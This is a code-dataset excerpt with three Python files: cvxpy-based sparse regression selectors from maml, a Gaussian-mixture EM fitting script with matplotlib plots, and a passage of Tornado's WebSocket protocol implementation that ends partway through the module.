Dataset columns (name, dtype, value range):

| column | dtype | values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 - 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 - 209 |
| max_stars_repo_name | string | length 5 - 121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1 - 10 |
| max_stars_count | int64 | 1 - 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4 - 209 |
| max_issues_repo_name | string | length 5 - 121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1 - 10 |
| max_issues_count | int64 | 1 - 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4 - 209 |
| max_forks_repo_name | string | length 5 - 121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1 - 10 |
| max_forks_count | int64 | 1 - 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 4 - 1.02M |
| avg_line_length | float64 | 1.07 - 66.1k |
| max_line_length | int64 | 4 - 266k |
| alphanum_fraction | float64 | 0.01 - 1 |
hexsha: 2e558a6b97966f8cd0fa07448f3d28add3c6c4ed | size: 8,245 | ext: py | lang: Python
max_stars / max_issues / max_forks: maml/apps/symbolic/_selectors_cvxpy.py | exalearn/maml @ 1cf7a093af69dfde27aaecc17d0b9d34d5c3edff | ["BSD-3-Clause"] | count: null | event datetimes: null
content:
"""
This module implements more robust optmization
using the cvxpy package
"""
from typing import Optional, List, Dict, Union
import numpy as np
from scipy.linalg import lstsq
from monty.dev import requires
from maml.apps.symbolic._selectors import BaseSelector
try:
import cvxpy as cp
Expression = cp.expressions.expression.Expression
except ImportError:
cp = None
Expression = "Expression"
# pylint: disable=R0201
class BaseSelectorCP(BaseSelector):
"""
Base selector using cvxpy (CP)
"""
@requires(cp is not None, "cvxpy is not present.")
def __init__(self, coef_thres: float = 1e-6, method: str = "ECOS"):
"""
Base selector
Args:
            coef_thres (float): threshold to discard certain coefficients
method (str): solver for cvxpy problem. The default is ECOS
"""
super().__init__(coef_thres=coef_thres, method=method)
# pylint: disable=E1128
def select(self, x: np.ndarray, y: np.ndarray, options: Optional[Dict] = None) -> np.ndarray:
"""
Select feature indices from x
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
options (dict): kwargs for cp.Problem.solve
        Returns: array of int indices
"""
options = options or {}
n, p = x.shape
beta = cp.Variable(p)
objective = cp.Minimize(self.construct_loss(x, y, beta))
constraints = self.construct_constraints(x, y, beta)
prob = cp.Problem(objective, constraints)
prob.solve(solver=self.method, **options)
self.coef_ = beta.value
self.indices = np.where(np.abs(beta.value) > self.coef_thres)[0]
self.coef_[np.where(np.abs(self.coef_) <= self.coef_thres)[0]] = 0.0
return self.indices
def construct_constraints(
self, x: np.ndarray, y: np.ndarray, beta: Optional[cp.Variable] = None
) -> Optional[List[Expression]]: # type: ignore
"""
Get constraints dictionary from data, e.g.,
{"func": lambda beta: fun(x, y, beta), "type": "ineq"}
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta: (np.ndarray): target variable for optimization
Returns: dict of constraints
"""
return None
def construct_loss(self, x: np.ndarray, y: np.ndarray, beta: cp.Variable) -> Expression: # type: ignore
"""
Get loss function from data and tentative coefficients beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: loss value
"""
raise NotImplementedError
class DantzigSelectorCP(BaseSelectorCP):
"""
Equation 11 in
https://orfe.princeton.edu/~jqfan/papers/06/SIS.pdf
and reference in https://projecteuclid.org/download/pdfview_1/euclid.aos/1201012958
"""
@requires(cp is not None, "cvxpy is not present.")
def __init__(self, lambd, sigma=1.0, **kwargs):
"""
Dantzig selector
Args:
            lambd (float): tunable regularization parameter
            sigma (float): standard deviation of the error
"""
self.lambd = lambd
self.sigma = sigma
super().__init__(**kwargs)
def construct_loss(self, x: np.ndarray, y: np.ndarray, beta: cp.Variable) -> Expression: # type: ignore
"""
L1 loss
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (cp.Variable): dimension N vector for optimization
Returns: loss expression
"""
return cp.norm1(beta)
def construct_constraints(
self, x: np.ndarray, y: np.ndarray, beta: Optional[cp.Variable] = None
) -> Optional[List[Expression]]: # type: ignore
"""
Dantzig selector constraints
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (cp.Variable): dimension N vector for optimization
Returns: List of constraints
"""
return [cp.norm_inf(x.T @ (y - x @ beta)) <= self.lambd * self.sigma]
class PenalizedLeastSquaresCP(BaseSelectorCP):
"""
Penalized least squares. In addition to minimizing the sum of squares loss,
it adds an additional penalty to the coefficients
"""
def construct_loss(self, x: np.ndarray, y: np.ndarray, beta: cp.Variable) -> Expression: # type: ignore
"""
        Penalized sum-of-squares loss
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (cp.Variable): dimension N vector for optimization
Returns: loss expression
"""
n = x.shape[0]
se = 1.0 / (2 * n) * cp.sum_squares(y - x @ beta) + self.penalty(beta, x=x, y=y)
return se
def penalty(
self, beta: cp.Variable, x: Optional[np.ndarray] = None, y: Optional[np.ndarray] = None
) -> Union[Expression, float]: # type: ignore
"""
Calculate the penalty from input x, output y and coefficient beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: penalty value
"""
return 0.0
class LassoCP(PenalizedLeastSquaresCP):
"""
Simple Lasso regression
"""
@requires(cp is not None, "cvxpy not installed")
def __init__(self, lambd, **kwargs):
"""
Lasso regression with lambda * norm_1(beta) as penalty
Args:
lambd (float): weights for the penalty
**kwargs:
"""
self.lambd = lambd
super().__init__(**kwargs)
def penalty(
self, beta: cp.Variable, x: Optional[np.ndarray] = None, y: Optional[np.ndarray] = None
) -> Union[Expression, float]: # type: ignore
"""
Calculate the penalty from input x, output y and coefficient beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: penalty value
"""
beta_abs = cp.norm1(beta)
return self.lambd * beta_abs
class AdaptiveLassoCP(PenalizedLeastSquaresCP):
"""
Adaptive lasso regression using OLS coefficients
as the root-n estimator coefficients
"""
@requires(cp is not None, "cvxpy not installed")
def __init__(self, lambd, gamma, **kwargs):
"""
Adaptive lasso regression
Args:
            lambd (float or list of floats): weights for the penalty
gamma (float): exponential for hat(beta)
**kwargs:
"""
self.lambd = lambd
self.gamma = gamma
self.w = 1
super().__init__(**kwargs)
def select(self, x: np.ndarray, y: np.ndarray, options: Optional[Dict] = None) -> np.ndarray:
"""
Select feature indices from x
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
options (dict): options in the cp.Problem.solve
        Returns: array of int indices
"""
self.w = self.get_w(x, y)
return super().select(x, y, options)
def get_w(self, x: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Get adaptive weights from data
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
Returns: coefficients array
"""
beta_hat = lstsq(x, y)[0]
w = 1.0 / np.abs(beta_hat) ** self.gamma
return w
def penalty(
self, beta: cp.Variable, x: Optional[np.ndarray] = None, y: Optional[np.ndarray] = None
) -> Union[Expression, float]: # type: ignore
"""
Calculate the penalty from input x, output y and coefficient beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: penalty value
"""
return cp.sum(self.lambd * cp.multiply(self.w, cp.abs(beta)))
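# Illustrative usage sketch: assumes cvxpy is installed; the data below is
# synthetic and the lambda value is an arbitrary choice for the demonstration.
if __name__ == "__main__":
    rng = np.random.RandomState(42)
    x_demo = rng.normal(size=(100, 10))
    true_beta = np.zeros(10)
    true_beta[[1, 4]] = [2.0, -3.0]
    y_demo = x_demo @ true_beta + 0.01 * rng.normal(size=100)
    # Lasso with an L1 penalty weight of 0.1; select() returns indices of
    # features whose fitted coefficients exceed coef_thres (expected to
    # include 1 and 4 for this synthetic problem).
    selector = LassoCP(lambd=0.1)
    print(selector.select(x_demo, y_demo))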
avg_line_length: 32.848606 | max_line_length: 108 | alphanum_fraction: 0.588235
hexsha: 10ec37ccefb9c234b48cf16ca492b47acbc153c6 | size: 3,588 | ext: py | lang: Python
max_stars / max_issues / max_forks: gmm_mle/q3.py | nssuperx/PatternRecognition @ cfb8de6947c2f01cf7825946e1879836167ba849 | ["Unlicense"] | count: null | event datetimes: null
content:
# -*- coding: utf-8 -*-
import numpy as np
from scipy.stats import norm
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
# Reference: test_gmm.py
# 5 mixture components; mu and sigma are set arbitrarily inside the function
def q3func_gmm(n, fill=0.0):
x = np.zeros(n)
g = np.random.randn(n)
u = np.random.rand(n)
mu = np.array([1.0, 3.0, 5.0, 7.0, 9.0])
sigma = np.array([0.1, 0.3, 0.5, 0.5, 0.5])
flag = (0 <= u) & (u < 1/5)
x = (mu[0] + sigma[0]*g)*flag
flag = (1/5 <= u) & (u < 2/5)
x += (mu[1] + sigma[1]*g)*flag
    flag = (2/5 <= u) & (u < 3/5)
x += (mu[2] + sigma[2]*g)*flag
    flag = (3/5 <= u) & (u < 4/5)
x += (mu[3] + sigma[3]*g)*flag
flag = (4/5 <= u) & (u <= 1)
x += (mu[4] + sigma[4]*g)*flag
return x
# Reference: p118a.py, p118c.py
n = 1000 # number of samples
m = 3 # number of mixture components
x = q3func_gmm(n)
L = -np.inf
w = np.ones(m)/m
w = w.reshape(m,1) # reshape into a column vector
mu = np.linspace(min(x), max(x), m) # initial means
mu = mu.reshape(m,1)
sigma2 = np.ones(m)/10 # initial variances
sigma2 = sigma2.reshape(m,1)
Lt = L
wt = w
mut = mu
sigma2t = sigma2
t=0
tt = np.array([0])
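# EM updates implemented by the loop below (k indexes the m components,
# i indexes the n samples):
#   E-step: eta[k, i] = w[k] * N(x[i]; mu[k], sigma2[k]) / sum_j w[j] * N(x[i]; mu[j], sigma2[j])
#   M-step: w[k]      = (1/n) * sum_i eta[k, i]
#           mu[k]     = sum_i eta[k, i] * x[i] / sum_i eta[k, i]
#           sigma2[k] = sum_i eta[k, i] * (x[i] - mu[k])^2 / sum_i eta[k, i]
#             (the squared deviations reuse the mu from before the update)
# L is the log-likelihood; the loop stops when its improvement falls below the threshold.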
while 1:
tmp1 = np.square(np.tile(x, (m,1)) - np.tile(mu, (1,n)))
tmp2 = 2 * np.tile(sigma2, (1,n))
tmp3 = np.tile(w, (1,n)) * np.exp(-tmp1 / tmp2) / np.sqrt(np.pi * tmp2)
eta = tmp3 / np.tile(np.sum(tmp3, axis=0), (m,1))
tmp4 = np.sum(eta, axis=1)
w = tmp4 / n
w = w.reshape(m, 1)
mu = (eta.dot(x)) / tmp4
mu = mu.reshape(m, 1)
sigma2 = np.sum(tmp1*eta, axis=1) / tmp4
sigma2 = sigma2.reshape(m,1)
Lnew = np.sum(np.log(np.sum(tmp3,axis=0)))
wt = np.append(wt,w, axis=1)
mut = np.append(mut,mu, axis=1)
sigma2t = np.append(sigma2t,sigma2, axis=1)
    if Lnew - L < 0.0001: # convergence threshold
break
L = Lnew
Lt = np.append(Lt,L)
t = t+1
tt = np.append(tt,t)
# http://bicycle1885.hatenablog.com/entry/2014/02/14/023734
# https://qiita.com/Tatejimaru137/items/50fb90dd52f194979a13
fig, axs = plt.subplots(2, 2)
xx = np.arange(0,10,0.01)
y0 = norm.pdf(xx, mu[0], np.sqrt(sigma2[0])) # probability density function
y1 = norm.pdf(xx, mu[1], np.sqrt(sigma2[1]))
y2 = norm.pdf(xx, mu[2], np.sqrt(sigma2[2]))
y = w[0] * y0 + w[1] * y1 + w[2] * y2
# axs[0,0].hist(x, bins='auto', normed=True)
axs[0,0].hist(x, bins=100, density=True)
axs[0,0].plot(xx, y, color='r')
# axs[0,0].plot(xx, y0, color='g')
# axs[0,0].plot(xx, y1, color='b')
# axs[0,0].plot(xx, y2, color='y')
axs[0,1].plot(wt[0], label="w0")
axs[0,1].plot(wt[1], label="w1")
axs[0,1].plot(wt[2], label="w2")
axs[0,1].set_xlabel('time')
axs[0,1].set_ylabel('w0, w1, and w2')
axs[0,1].grid(True)
# axs[0,1].xaxis.set_major_locator(MultipleLocator(2)) # integer ticks every 2
axs[0,1].legend(bbox_to_anchor=(1, 1), loc='upper right')
axs[1,0].plot(mut[0], label="mu0")
axs[1,0].plot(mut[1], label="mu1")
axs[1,0].plot(mut[2], label="mu2")
axs[1,0].set_xlabel('time')
axs[1,0].set_ylabel('mu0, mu1, and mu2')
axs[1,0].grid(True)
# axs[1,0].xaxis.set_major_locator(MultipleLocator(2))
axs[1,0].legend(bbox_to_anchor=(1, 1), loc='upper right')
axs[1,1].plot(np.sqrt(sigma2t[0]), label="sigma0")
axs[1,1].plot(np.sqrt(sigma2t[1]), label="sigma1")
axs[1,1].plot(np.sqrt(sigma2t[2]), label="sigma2")
axs[1,1].set_xlabel('time')
axs[1,1].set_ylabel('sigma0, 1, and 2')
axs[1,1].grid(True)
# axs[1,1].xaxis.set_major_locator(MultipleLocator(2))
axs[1,1].legend(bbox_to_anchor=(1, 1), loc='upper right')
fig.tight_layout() # adjust the spacing between subplots
plt.show()
avg_line_length: 29.652893 | max_line_length: 79 | alphanum_fraction: 0.564103
hexsha: f5e3dbd7f80a6d939c3323396c89afca28ee410f | size: 40,773 | ext: py | lang: Python
max_stars: tornado/websocket.py | fengsp/tornado @ 43e23f977715396ce243c6cd7e3387abf2a2e4ee | ["Apache-2.0"] | count: 1 | events: 2016-04-08T03:23:58.000Z to 2016-04-08T03:23:58.000Z
max_issues: tornado/websocket.py | fengsp/tornado @ 43e23f977715396ce243c6cd7e3387abf2a2e4ee | ["Apache-2.0"] | count: 1 | events: 2017-09-19T09:52:54.000Z to 2017-09-19T09:52:54.000Z
max_forks: tornado/websocket.py | fengsp/tornado @ 43e23f977715396ce243c6cd7e3387abf2a2e4ee | ["Apache-2.0"] | count: 1 | events: 2016-09-12T09:32:32.000Z to 2016-09-12T09:32:32.000Z
content:
"""Implementation of the WebSocket protocol.
`WebSockets <http://dev.w3.org/html5/websockets/>`_ allow for bidirectional
communication between the browser and server.
WebSockets are supported in the current versions of all major browsers,
although older versions that do not support WebSockets are still in use
(refer to http://caniuse.com/websockets for details).
This module implements the final version of the WebSocket protocol as
defined in `RFC 6455 <http://tools.ietf.org/html/rfc6455>`_. Certain
browser versions (notably Safari 5.x) implemented an earlier draft of
the protocol (known as "draft 76") and are not compatible with this module.
.. versionchanged:: 4.0
Removed support for the draft 76 protocol version.
"""
from __future__ import absolute_import, division, print_function, with_statement
# Author: Jacob Kristhammar, 2010
import base64
import collections
import hashlib
import os
import struct
import tornado.escape
import tornado.web
import zlib
from tornado.concurrent import TracebackFuture
from tornado.escape import utf8, native_str, to_unicode
from tornado import httpclient, httputil
from tornado.ioloop import IOLoop
from tornado.iostream import StreamClosedError
from tornado.log import gen_log, app_log
from tornado import simple_httpclient
from tornado.tcpclient import TCPClient
from tornado.util import _websocket_mask
try:
    from urllib.parse import urlparse  # py3
except ImportError:
    from urlparse import urlparse  # py2
try:
xrange # py2
except NameError:
xrange = range # py3
class WebSocketError(Exception):
pass
class WebSocketClosedError(WebSocketError):
"""Raised by operations on a closed connection.
.. versionadded:: 3.2
"""
pass
class WebSocketHandler(tornado.web.RequestHandler):
"""Subclass this class to create a basic WebSocket handler.
Override `on_message` to handle incoming messages, and use
`write_message` to send messages to the client. You can also
override `open` and `on_close` to handle opened and closed
connections.
See http://dev.w3.org/html5/websockets/ for details on the
JavaScript interface. The protocol is specified at
http://tools.ietf.org/html/rfc6455.
    Here is an example WebSocket handler that echoes all received messages
    back to the client:
.. testcode::
class EchoWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
print("WebSocket opened")
def on_message(self, message):
self.write_message(u"You said: " + message)
def on_close(self):
print("WebSocket closed")
.. testoutput::
:hide:
WebSockets are not standard HTTP connections. The "handshake" is
HTTP, but after the handshake, the protocol is
message-based. Consequently, most of the Tornado HTTP facilities
are not available in handlers of this type. The only communication
methods available to you are `write_message()`, `ping()`, and
    `close()`. Likewise, your request handler class should implement the
`open()` method rather than ``get()`` or ``post()``.
If you map the handler above to ``/websocket`` in your application, you can
invoke it in JavaScript with::
var ws = new WebSocket("ws://localhost:8888/websocket");
ws.onopen = function() {
ws.send("Hello, world");
};
ws.onmessage = function (evt) {
alert(evt.data);
};
This script pops up an alert box that says "You said: Hello, world".
Web browsers allow any site to open a websocket connection to any other,
instead of using the same-origin policy that governs other network
access from javascript. This can be surprising and is a potential
security hole, so since Tornado 4.0 `WebSocketHandler` requires
applications that wish to receive cross-origin websockets to opt in
by overriding the `~WebSocketHandler.check_origin` method (see that
method's docs for details). Failure to do so is the most likely
cause of 403 errors when making a websocket connection.
When using a secure websocket connection (``wss://``) with a self-signed
certificate, the connection from a browser may fail because it wants
to show the "accept this certificate" dialog but has nowhere to show it.
You must first visit a regular HTML page using the same certificate
to accept it before the websocket connection will succeed.
"""
def __init__(self, application, request, **kwargs):
super(WebSocketHandler, self).__init__(application, request, **kwargs)
self.ws_connection = None
self.close_code = None
self.close_reason = None
self.stream = None
self._on_close_called = False
@tornado.web.asynchronous
def get(self, *args, **kwargs):
self.open_args = args
self.open_kwargs = kwargs
# Upgrade header should be present and should be equal to WebSocket
if self.request.headers.get("Upgrade", "").lower() != 'websocket':
self.set_status(400)
log_msg = "Can \"Upgrade\" only to \"WebSocket\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Connection header should be upgrade.
# Some proxy servers/load balancers
# might mess with it.
headers = self.request.headers
connection = map(lambda s: s.strip().lower(),
headers.get("Connection", "").split(","))
if 'upgrade' not in connection:
self.set_status(400)
log_msg = "\"Connection\" must be \"Upgrade\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Handle WebSocket Origin naming convention differences
# The difference between version 8 and 13 is that in 8 the
# client sends a "Sec-Websocket-Origin" header and in 13 it's
# simply "Origin".
if "Origin" in self.request.headers:
origin = self.request.headers.get("Origin")
else:
origin = self.request.headers.get("Sec-Websocket-Origin", None)
# If there was an origin header, check to make sure it matches
# according to check_origin. When the origin is None, we assume it
# did not come from a browser and that it can be passed on.
if origin is not None and not self.check_origin(origin):
self.set_status(403)
log_msg = "Cross origin websockets not allowed"
self.finish(log_msg)
gen_log.debug(log_msg)
return
self.stream = self.request.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
self.ws_connection = self.get_websocket_protocol()
if self.ws_connection:
self.ws_connection.accept_connection()
else:
if not self.stream.closed():
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 426 Upgrade Required\r\n"
"Sec-WebSocket-Version: 7, 8, 13\r\n\r\n"))
self.stream.close()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket.
The message may be either a string or a dict (which will be
encoded as json). If the ``binary`` argument is false, the
message will be sent as utf8; in binary mode any byte string
is allowed.
If the connection is already closed, raises `WebSocketClosedError`.
.. versionchanged:: 3.2
`WebSocketClosedError` was added (previously a closed connection
would raise an `AttributeError`)
.. versionchanged:: 4.3
Returns a `.Future` which can be used for flow control.
"""
if self.ws_connection is None:
raise WebSocketClosedError()
if isinstance(message, dict):
message = tornado.escape.json_encode(message)
return self.ws_connection.write_message(message, binary=binary)
def select_subprotocol(self, subprotocols):
"""Invoked when a new WebSocket requests specific subprotocols.
``subprotocols`` is a list of strings identifying the
subprotocols proposed by the client. This method may be
overridden to return one of those strings to select it, or
``None`` to not select a subprotocol. Failure to select a
subprotocol does not automatically abort the connection,
although clients may close the connection if none of their
proposed subprotocols was selected.
"""
return None
def get_compression_options(self):
"""Override to return compression options for the connection.
If this method returns None (the default), compression will
be disabled. If it returns a dict (even an empty one), it
will be enabled. The contents of the dict may be used to
control the memory and CPU usage of the compression,
but no such options are currently implemented.
.. versionadded:: 4.1
"""
return None
def open(self, *args, **kwargs):
"""Invoked when a new WebSocket is opened.
The arguments to `open` are extracted from the `tornado.web.URLSpec`
regular expression, just like the arguments to
`tornado.web.RequestHandler.get`.
"""
pass
def on_message(self, message):
"""Handle incoming messages on the WebSocket
This method must be overridden.
"""
raise NotImplementedError
def ping(self, data):
"""Send ping frame to the remote end."""
if self.ws_connection is None:
raise WebSocketClosedError()
self.ws_connection.write_ping(data)
def on_pong(self, data):
"""Invoked when the response to a ping frame is received."""
pass
def on_close(self):
"""Invoked when the WebSocket is closed.
If the connection was closed cleanly and a status code or reason
phrase was supplied, these values will be available as the attributes
``self.close_code`` and ``self.close_reason``.
.. versionchanged:: 4.0
Added ``close_code`` and ``close_reason`` attributes.
"""
pass
def close(self, code=None, reason=None):
"""Closes this Web Socket.
Once the close handshake is successful the socket will be closed.
``code`` may be a numeric status code, taken from the values
defined in `RFC 6455 section 7.4.1
<https://tools.ietf.org/html/rfc6455#section-7.4.1>`_.
``reason`` may be a textual message about why the connection is
closing. These values are made available to the client, but are
not otherwise interpreted by the websocket protocol.
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.ws_connection:
self.ws_connection.close(code, reason)
self.ws_connection = None
def check_origin(self, origin):
"""Override to enable support for allowing alternate origins.
The ``origin`` argument is the value of the ``Origin`` HTTP
header, the url responsible for initiating this request. This
method is not called for clients that do not send this header;
such requests are always allowed (because all browsers that
implement WebSockets support this header, and non-browser
clients do not have the same cross-site security concerns).
Should return True to accept the request or False to reject it.
By default, rejects all requests with an origin on a host other
than this one.
This is a security protection against cross site scripting attacks on
browsers, since WebSockets are allowed to bypass the usual same-origin
policies and don't use CORS headers.
To accept all cross-origin traffic (which was the default prior to
Tornado 4.0), simply override this method to always return true::
def check_origin(self, origin):
return True
To allow connections from any subdomain of your site, you might
do something like::
def check_origin(self, origin):
parsed_origin = urllib.parse.urlparse(origin)
return parsed_origin.netloc.endswith(".mydomain.com")
.. versionadded:: 4.0
"""
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = self.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def set_nodelay(self, value):
"""Set the no-delay flag for this stream.
By default, small messages may be delayed and/or combined to minimize
the number of packets sent. This can sometimes cause 200-500ms delays
due to the interaction between Nagle's algorithm and TCP delayed
ACKs. To reduce this delay (at the expense of possibly increasing
bandwidth usage), call ``self.set_nodelay(True)`` once the websocket
connection is established.
See `.BaseIOStream.set_nodelay` for additional details.
.. versionadded:: 3.1
"""
self.stream.set_nodelay(value)
def on_connection_close(self):
if self.ws_connection:
self.ws_connection.on_connection_close()
self.ws_connection = None
if not self._on_close_called:
self._on_close_called = True
self.on_close()
def send_error(self, *args, **kwargs):
if self.stream is None:
super(WebSocketHandler, self).send_error(*args, **kwargs)
else:
# If we get an uncaught exception during the handshake,
# we have no choice but to abruptly close the connection.
# TODO: for uncaught exceptions after the handshake,
# we can close the connection more gracefully.
self.stream.close()
def get_websocket_protocol(self):
websocket_version = self.request.headers.get("Sec-WebSocket-Version")
if websocket_version in ("7", "8", "13"):
return WebSocketProtocol13(
self, compression_options=self.get_compression_options())
def _wrap_method(method):
def _disallow_for_websocket(self, *args, **kwargs):
if self.stream is None:
method(self, *args, **kwargs)
else:
raise RuntimeError("Method not supported for Web Sockets")
return _disallow_for_websocket
for method in ["write", "redirect", "set_header", "set_cookie",
"set_status", "flush", "finish"]:
setattr(WebSocketHandler, method,
_wrap_method(getattr(WebSocketHandler, method)))
class WebSocketProtocol(object):
"""Base class for WebSocket protocol versions.
"""
def __init__(self, handler):
self.handler = handler
self.request = handler.request
self.stream = handler.stream
self.client_terminated = False
self.server_terminated = False
def _run_callback(self, callback, *args, **kwargs):
"""Runs the given callback with exception handling.
On error, aborts the websocket connection and returns False.
"""
try:
callback(*args, **kwargs)
except Exception:
app_log.error("Uncaught exception in %s",
self.request.path, exc_info=True)
self._abort()
def on_connection_close(self):
self._abort()
def _abort(self):
"""Instantly aborts the WebSocket connection by closing the socket"""
self.client_terminated = True
self.server_terminated = True
self.stream.close() # forcibly tear down the connection
self.close() # let the subclass cleanup
class _PerMessageDeflateCompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
# There is no symbolic constant for the minimum wbits value.
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._compressor = self._create_compressor()
else:
self._compressor = None
def _create_compressor(self):
return zlib.compressobj(tornado.web.GZipContentEncoding.GZIP_LEVEL,
zlib.DEFLATED, -self._max_wbits)
def compress(self, data):
compressor = self._compressor or self._create_compressor()
data = (compressor.compress(data) +
compressor.flush(zlib.Z_SYNC_FLUSH))
assert data.endswith(b'\x00\x00\xff\xff')
return data[:-4]
class _PerMessageDeflateDecompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._decompressor = self._create_decompressor()
else:
self._decompressor = None
def _create_decompressor(self):
return zlib.decompressobj(-self._max_wbits)
def decompress(self, data):
decompressor = self._decompressor or self._create_decompressor()
return decompressor.decompress(data + b'\x00\x00\xff\xff')
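# Note on the 4-byte trailer handled above: zlib's Z_SYNC_FLUSH terminates each
# flush with an empty stored block, the bytes 0x00 0x00 0xff 0xff. The
# permessage-deflate extension transmits messages without that trailer, so the
# compressor strips the last four bytes and the decompressor appends them back
# before inflating.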
class WebSocketProtocol13(WebSocketProtocol):
"""Implementation of the WebSocket protocol from RFC 6455.
This class supports versions 7 and 8 of the protocol in addition to the
final version 13.
"""
# Bit masks for the first byte of a frame.
FIN = 0x80
RSV1 = 0x40
RSV2 = 0x20
RSV3 = 0x10
RSV_MASK = RSV1 | RSV2 | RSV3
OPCODE_MASK = 0x0f
def __init__(self, handler, mask_outgoing=False,
compression_options=None):
WebSocketProtocol.__init__(self, handler)
self.mask_outgoing = mask_outgoing
self._final_frame = False
self._frame_opcode = None
self._masked_frame = None
self._frame_mask = None
self._frame_length = None
self._fragmented_message_buffer = None
self._fragmented_message_opcode = None
self._waiting = None
self._compression_options = compression_options
self._decompressor = None
self._compressor = None
self._frame_compressed = None
# The total uncompressed size of all messages received or sent.
# Unicode messages are encoded to utf8.
# Only for testing; subject to change.
self._message_bytes_in = 0
self._message_bytes_out = 0
# The total size of all packets received or sent. Includes
# the effect of compression, frame overhead, and control frames.
self._wire_bytes_in = 0
self._wire_bytes_out = 0
def accept_connection(self):
try:
self._handle_websocket_headers()
self._accept_connection()
except ValueError:
gen_log.debug("Malformed WebSocket request received",
exc_info=True)
self._abort()
return
def _handle_websocket_headers(self):
"""Verifies all invariant- and required headers
If a header is missing or have an incorrect value ValueError will be
raised
"""
fields = ("Host", "Sec-Websocket-Key", "Sec-Websocket-Version")
if not all(map(lambda f: self.request.headers.get(f), fields)):
raise ValueError("Missing/Invalid WebSocket headers")
@staticmethod
def compute_accept_value(key):
"""Computes the value for the Sec-WebSocket-Accept header,
given the value for Sec-WebSocket-Key.
"""
sha1 = hashlib.sha1()
sha1.update(utf8(key))
sha1.update(b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11") # Magic value
return native_str(base64.b64encode(sha1.digest()))
def _challenge_response(self):
return WebSocketProtocol13.compute_accept_value(
self.request.headers.get("Sec-Websocket-Key"))
def _accept_connection(self):
subprotocol_header = ''
subprotocols = self.request.headers.get("Sec-WebSocket-Protocol", '')
subprotocols = [s.strip() for s in subprotocols.split(',')]
if subprotocols:
selected = self.handler.select_subprotocol(subprotocols)
if selected:
assert selected in subprotocols
subprotocol_header = ("Sec-WebSocket-Protocol: %s\r\n"
% selected)
extension_header = ''
extensions = self._parse_extensions_header(self.request.headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
# TODO: negotiate parameters if compression_options
# specifies limits.
self._create_compressors('server', ext[1])
if ('client_max_window_bits' in ext[1] and
ext[1]['client_max_window_bits'] is None):
# Don't echo an offered client_max_window_bits
# parameter with no value.
del ext[1]['client_max_window_bits']
extension_header = ('Sec-WebSocket-Extensions: %s\r\n' %
httputil._encode_header(
'permessage-deflate', ext[1]))
break
if self.stream.closed():
self._abort()
return
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Accept: %s\r\n"
"%s%s"
"\r\n" % (self._challenge_response(),
subprotocol_header, extension_header)))
self._run_callback(self.handler.open, *self.handler.open_args,
**self.handler.open_kwargs)
self._receive_frame()
def _parse_extensions_header(self, headers):
extensions = headers.get("Sec-WebSocket-Extensions", '')
if extensions:
return [httputil._parse_header(e.strip())
for e in extensions.split(',')]
return []
def _process_server_headers(self, key, headers):
"""Process the headers sent by the server to this client connection.
'key' is the websocket handshake challenge/response key.
"""
assert headers['Upgrade'].lower() == 'websocket'
assert headers['Connection'].lower() == 'upgrade'
accept = self.compute_accept_value(key)
assert headers['Sec-Websocket-Accept'] == accept
extensions = self._parse_extensions_header(headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
self._create_compressors('client', ext[1])
else:
raise ValueError("unsupported extension %r", ext)
